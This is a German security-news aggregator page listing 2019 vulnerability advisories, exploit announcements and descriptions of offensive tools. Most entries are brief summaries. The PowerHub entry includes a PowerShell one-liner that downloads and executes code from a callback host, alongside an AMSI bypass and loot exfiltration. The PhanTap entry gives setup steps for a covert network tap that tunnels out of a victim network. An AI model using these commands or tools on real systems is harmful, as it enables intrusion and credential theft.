IT Security Tools
News Kategorien unterhalb von IT Security Tools: 0x
News RSS Feeds dieser IT Security Tools Kategorie: IT Security Tools
Benutze Feedly zum Abonieren.
Download RSS Feed App für Windows 10 Store (Leider gibt es nicht mehr viele Extensions mit welchen Sie RSS-Feeds in einer Software abonieren können. Der Browser Support für RSS-Feeds wurde eingestellt (Firefox,Chrome).
Eigene IT Security Webseite / Blog / Quelle hinzufügen
D-Link DIR-600M Wireless N 150 Home Router Access Bypass
A remote vulnerability was discovered on D-Link DIR-600M Wireless N 150 Home Router in multiple respective firmware versions. The vulnerability provides unauthenticated remote access to the router's WAN configuration page i.e. "wan.htm", which leads to disclosure of sensitive user information including but not limited to PPPoE, DNS configuration etc, also allowing to change the configuration settings as well. Metasploit module and NSE scripts are included.
Ubuntu Security Notice USN-4090-1
Ubuntu Security Notice 4090-1 - Tom Lane discovered that PostgreSQL did not properly restrict functions declared as "SECURITY DEFINER". An attacker could use this to execute arbitrary SQL with the permissions of the function owner. Andreas Seltenreich discovered that PostgreSQL did not properly handle user-defined hash equality operators. An attacker could use this to expose sensitive information. This issue only affected Ubuntu 19.04. Various other issues were also addressed.
Red Hat Security Advisory 2019-2425-01
Red Hat Security Advisory 2019-2425-01 - KVM is a full virtualization solution for Linux on a variety of architectures. The qemu-kvm-rhev packages provide the user-space component for running virtual machines that use KVM in environments managed by Red Hat products. Issues addressed include buffer overflow and information leakage vulnerabilities.
Debian Security Advisory 4493-1
Debian Linux Security Advisory 4493-1 - Two security issues have been discovered in the PostgreSQL database system, which could result in privilege escalation, denial of service or memory disclosure.
Debian Security Advisory 4492-1
Debian Linux Security Advisory 4492-1 - A issue has been discovered in the PostgreSQL database system, which could result in privilege escalation.
Adive Framework 2.0.7 Cross Site Request Forgery
Adive Framework version 2.0.7 suffers from a cross site request forgery vulnerability.
Joomla JS Support Ticket 1.1.5 Arbitrary File Download
Joomla JS Support Ticket component version 1.1.5 suffers from an arbitrary file download vulnerability.
Joomla JS Support Ticket 1.1.5 SQL Injection
Joomla JS Support Ticket component version 1.1.5 suffers from a remote SQL injection vulnerability.
Baldr Botnet Panel Shell Upload
This Metasploit module exploits the file upload vulnerability of baldr malware panel in order to achieve arbitrary code execution.
Aptana Jaxer 184.108.40.20647 Local File Inclusion
Aptana Jaxer version 220.127.116.1147 suffers from a local file inclusion vulnerability.
Open-School 3.0 / Community Edition 2.3 Cross Site Scripting
Open-School version 3.0 and Community Edition 2.3 suffers from a cross site scripting vulnerability.
Linux show_numa_stats() Use-After-Free
Linux suffers from use-after-free read vulnerabilities in show_numa_stats().
Slackware Security Advisory - kdelibs Updates
Slackware Security Advisory - New kdelibs packages are available for Slackware 14.2 and -current to fix a security issue.
Red Hat Security Advisory 2019-2413-01
Red Hat Security Advisory 2019-2413-01 - This release of Red Hat Fuse 7.4.0 serves as a replacement for Red Hat Fuse 7.3, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References. Issues addressed include bypass, code execution, cross site request forgery, and deserialization vulnerabilities.
MapProxy 1.11.0 Cross Site Scripting
MapProxy version 1.11.0 suffers from a cross site scripting vulnerability.
Daily Expense Manager 1.0 Cross Site Request Forgery
Daily Expense Manager version 1.0 suffers from a cross site request forgery vulnerability.
Fortinet FortiRecorder 2.7.3 Hardcoded Password
Fortinet FortiRecorder versions 2.7.3 and below have a hardcoded password vulnerability.
iOS Messaging Tools
This repository contains several tools Project Zero uses to test iPhone messaging. It includes SmsSimulator: an SMS simulator for iPhone, iMessage: tools for sending and dumping iMessage messages, and imapiness: a fuzzer for IMAP clients. See the directory for each tool for further instructions and contact information. This is not an officially supported Google product. These tools were released and presented at BlackHat USA 2019.
Slurp- To Security Audits of S3 Buckets Enumerator
Slurp- Blackbox/Whitebox S3 Bucket Enumerator
To Evaluate the security of S3 buckets
- Credit to all the vendor packages to develop Slurp possible.
- Slurp is for pen-testers and security professionals to perform audits of s3 buckets.
- Scan via domain(s); you can target a single domain or a list of domains
- Scan via keyword(s); you can target a single keyword or a list of keywords
- Scan via AWS credentials; you can target your own AWS account to see which buckets have been exposed
- Colorized output for visual grep
- Currently generates over 28,000 permutations per domain and keyword (thanks to @jakewarren and @random-robbie)
- Punycode support for internationalized domains
- Strong copyleft license (GPLv3)
ModesThere are two modes that this tool operates at; blackbox and whitebox mode. Whitebox mode (or internal) is significantly faster than blackbox (external) mode.
Blackbox (external)In this mode, you are using the permutations list to conduct scans. It will return false positives and there is no way to link the buckets to an actual aws account! Do not open issues asking how to do this.
Whitebox (internal)In this mode, you are using the AWS API with credentials on a specific account that you own to see what is open. This method pulls all S3 buckets and checks Policy/ACL permissions. Note that, I will not provide support on how to use the AWS API.
Your credentials should be in ~/.aws/credentials.
- slurp domain <-t|--target> example.com will enumerate the S3 domains for a specific target.
- slurp keyword <-t|--target> linux,golang,python will enumerate S3 buckets based on those 3 key words.
- slurp internal performs an internal scan using the AWS API.
InstallationThis project uses vgo; you can clone and go build or download from Releases section.
Please do not open issues on why you cannot build the project; this project builds like any other project would in Go, if you cannot build then I strongly suggest you read the go spec.
Also, the only binaries I'm including are linux/amd64; if you want mac/windows binaries, build it yourself.
PowerHub- A Post Exploitation Suite To Bypass Endpoint Protection
PowerHub- A Post Exploitation Suite To Bypass Endpoint Protection
PowerHub is a convenient post exploitation tool which aids a pentester in transferring files, in particular code which may get flagged by endpoint protection.
During an engagement where you have a test client available, one of the first things you want to do is run PowerSploit. So you need to download the files, messing with endpoint protection, disable the execution policy, etc.
PowerHub provides an (almost) one-click-solution for this. Oh, and you can also run arbitrary binaries (PE and shell code) entirely in-memory using PowerSploit's modules, which is sometimes useful to bypass application whitelisting.
Your loot (Kerberos tickets, passwords, etc.) can be easily transferred back either as a file or a text snippet, via the command line or the web interface. PowerHub also helps with collaboration in case you're a small team.
On top of that, PowerHub comes with a reverse PowerShell, making it suitable for any kind of post-exploitation action.
Here is a simple example (grab information about local groups with PowerView and transfer it back):
PS C:\Users\avollmer> $K=new-object net.webclient;IEX $K.downloadstring('http://192.168.11.2:8000/0');
_____ _____ _ _ _ _______ ______ _ _ _ _ ______
|_____] | | | | | |______ |_____/ |_____| | | |_____]
| |_____| |__|__| |______ | \_ | | |_____| |_____]
written by Adrian Vollmer, 2018-2019
Run 'Help-PowerHub' for help
AmsiScanBuffer patch has been applied.
PS C:\Users\avollmer> lhm powerview
[*] /ps1/PowerSploit/Recon/PowerView.ps1 imported.
PS C:\Users\avollmer> Get-LocalGroup | pth -Name groups.json
InstallationPowerHub itself does not need to be installed. Just execute powerhub.py. However, there are a few dependencies. They are listed in the requirements.txt. Install them either via pip3 install --user -r requirements.txt or use a virtual environment:
Run python3 -m venv env to create a virtual environment, then use source env/bin/activate to activate it. Now run pip3 install -r requirements.txt to install the depencendies inside the virtual environment.
Python2 is not supported.
UsagePowerHub has one mandatory argument: the callback host (can be an IP address). You should also use --auth <user>:<pass>, otherwise, a randomly generated password will be used for basic authentication.
The switch --no-auth disables basic authentication which is not recommended. The callback host name is used by the stager to download the payload. If the callback port or path differ from the default, it can also be changed.
Read ./powerhub.py --help and the Wiki for details.
Phantom Tap (PhanTap) - An ‘Invisible’ Network Tap
Phantom Tap (PhanTap) - An ‘Invisible’ Network Tap Aimed at Red Teams.
With limited physical access to a target building, this tap can be installed inline between a network device and the corporate network.
PhanTap is silent in the network and does not affect the victim’s traffic, even in networks having NAC (Network Access Control 802.1X - 2004). PhanTap will analyze traffic on the network and mask its traffic as the victim device.
It can mount a tunnel back to a remote server, giving the user a foothold in the network for further analysis and pivoting. PhanTap is an OpenWrt package and should be compatible with any device. The physical device used for our testing is currently a small, inexpensive router, the GL.iNet GL-AR150.
- Transparent network bridge.
- Silent : No ARP, multicast, broadcast.
- 802.1x passthrough.
- Automatic configuration:
SNAT bridge traffic to the victim MAC and IP address,
set the router default gateway to the MAC of the gateway detected just before.
- Introspects ARP, multicast and broadcast traffic and adds a route to the machine IP address and adds the machine MAC address to the neighbor list, hence giving the possibility of talking to all the machines in the local network.
- Learns the DNS server from traffic and modifies the one on the router so that it's the same.
- Can run commands (ex: /etc/init.d/openvpn restart) when a new IP or DNS is configured.
- Lets you choose any VPN software, for example OpenVPN tcp port 443 so it goes through most firewalls.
- You can talk to the victim machine (using the gateway IP).
SetupPhanTap has been tested with the GL.iNet GL-AR150. This device has two separate network interfaces in OpenWrt (eth0, eth1).
If your device is using an internal switch (swconfig based) with interfaces like eth0.1, eth0.2, some special traffic might be blocked, e.g. 802.1Q (tagged vlan), but PhanTap should work.
- Install a snapshot build, for the GL.iNet GL-AR150
- Update the OpenWrt package list
- Install PhanTap package:
- Configure the Wifi and start administering the router through it.
- Either reboot the device, or run /etc/init.d/phantap setup.
- Get the interface names from that device:
In this example we are using a GL-AR150, which only has 2 interfaces.
Add the interfaces to the phantap bridge via the following commands in the cli (assuming we are using a GL-AR150):
- uci delete network.lan.ifname
- uci delete network.wan.ifname
- uci delete network.wan6.ifname
- uci set network.phantap.ifname='eth0 eth1'
- uci commit network
- /etc/init.d/network reload
Phantap is now configured, as soon as you plug it between a victim and their switch, it will automatically configure the router and give it Internet access.
You can add your favorite VPN to have a remote connection back. Tested PhanTap with Vpn, port TCP 443, to avoid some detection methods.
You can also add a command to be ran when a new IP or DNS is configured, in /etc/config/phantap, e.g. /etc/init.d/openvpn restart (restart VPN service).
You can also look at disabling the wifi by default and using hardware buttons to start it (https://openwrt.org/docs/guide-user/hardware/hardware.button).
Limitations or how it can be detected :
- The GL.iNet GL-AR150 and most inexpensive devices only support 100Mbps, meanwhile modern network traffic will be 1Gbps.
- The network port will stay up, switch side, when the victim device is disconnected/shutdown.
- There is no re-configuration of PhanTap, so we might use an IP that has been reattributed to another device (roadmap DHCP).
- Some traffic is blocked by the Linux bridge (STP/Pause frames/LACP).
- Add logic to restart the detection when the links go up/down.
- Add DHCP packet analysis for dynamic reconfiguration.
- Add IPv6 support.
- Test limitations of devices that have switches(swconfig) instead of separate interfaces.
Scapy Packet Manipulation Tool 2.4.3
Scapy is a powerful interactive packet manipulation tool, packet generator, network scanner, network discovery tool, and packet sniffer. It provides classes to interactively create packets or sets of packets, manipulate them, send them over the wire, sniff other packets from the wire, match answers and replies, and more. Interaction is provided by the Python interpreter, so Python programming structures can be used (such as variables, loops, and functions). Report modules are possible and easy to make. It is intended to do the same things as ttlscan, nmap, hping, queso, p0f, xprobe, arping, arp-sk, arpspoof, firewalk, irpas, tethereal, tcpdump, etc.
Opencart 18.104.22.168 Insecure OCMod Generation Pre-Authentication Remote Code Execution
Opencart versions 22.214.171.124 and below insecure OCMod generation pre-authentication remote code execution exploit.
Ubuntu Security Notice USN-4089-1
Ubuntu Security Notice 4089-1 - It was discovered that Rack incorrectly handled carefully crafted requests. A remote attacker could use this issue to execute a cross-site scripting attack.
Red Hat Security Advisory 2019-2411-01
Red Hat Security Advisory 2019-2411-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system.
Ubuntu Security Notice USN-4088-1
Ubuntu Security Notice 4088-1 - It was discovered that PHP incorrectly handled certain regular expressions. An attacker could possibly use this issue to expose sensitive information, cause a denial of service or execute arbitrary code.
Red Hat Security Advisory 2019-2405-01
Red Hat Security Advisory 2019-2405-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.
Red Hat Security Advisory 2019-2399-01
Red Hat Security Advisory 2019-2399-01 - The libssh2 packages provide a library that implements the SSH2 protocol. Issues addressed include an out of bounds write vulnerability.
Red Hat Security Advisory 2019-2403-01
Red Hat Security Advisory 2019-2403-01 - Augeas is a configuration editing tool. It parses configuration files in their native formats and transforms them into a tree. Configuration changes are made by manipulating this tree and saving it back into native config files. A memory corruption vulnerability was addressed.
Red Hat Security Advisory 2019-2401-01
Red Hat Security Advisory 2019-2401-01 - The procps-ng packages contain a set of system utilities that provide system information, including ps, free, skill, pkill, pgrep, snice, tload, top, uptime, vmstat, w, watch, and pwdx. Issues addressed include a heap overflow vulnerability.
Red Hat Security Advisory 2019-2402-01
Red Hat Security Advisory 2019-2402-01 - The systemd packages contain systemd, a system and service manager for Linux, compatible with the SysV and LSB init scripts. It provides aggressive parallelism capabilities, uses socket and D-Bus activation for starting services, offers on-demand starting of daemons, and keeps track of processes using Linux cgroups. Stack overflow vulnerabilities have been addressed.
Red Hat Security Advisory 2019-2400-01
Red Hat Security Advisory 2019-2400-01 - Perl is a high-level programming language that is commonly used for system administration utilities and web programming. Issues addressed include a buffer overflow vulnerability.
Red Hat Security Advisory 2019-2002-01
Red Hat Security Advisory 2019-2002-01 - Redis is an advanced key-value store. It is often referred to as a data-structure server since keys can contain strings, hashes, lists, sets, and sorted sets. For performance, Redis works with an in-memory data set. You can persist it either by dumping the data set to disk every once in a while, or by appending each command to a log. Issues addressed include a buffer overflow vulnerability.
WordPress JoomSport 3.3 SQL Injection
WordPress JoomSport plugin version 3.3 suffers from a remote SQL injection vulnerability.
Mandos Encrypted File System Unattended Reboot Utility 1.8.7
The Mandos system allows computers to have encrypted root file systems and at the same time be capable of remote or unattended reboots. The computers run a small client program in the initial RAM disk environment which will communicate with a server over a network. All network communication is encrypted using TLS. The clients are identified by the server using an OpenPGP key that is unique to each client. The server sends the clients an encrypted password. The encrypted password is decrypted by the clients using the same OpenPGP key, and the password is then used to unlock the root file system.
SeitennavigationSeite 6 von 269 Seiten (Bei Beitrag 175 - 210)
9.407x Beiträge in dieser Kategorie
Auf Seite 5 zurück | Nächste 7 Seite | Letzte Seite
[ 1 ] [ 2 ] [ 3 ] [ 4 ] [ 5 ]  [ 7 ] [ 8 ] [ 9 ] [ 10 ] [ 11 ] [ 12 ] [ 13 ] [ 14 ] [ 15 ] [ 16 ]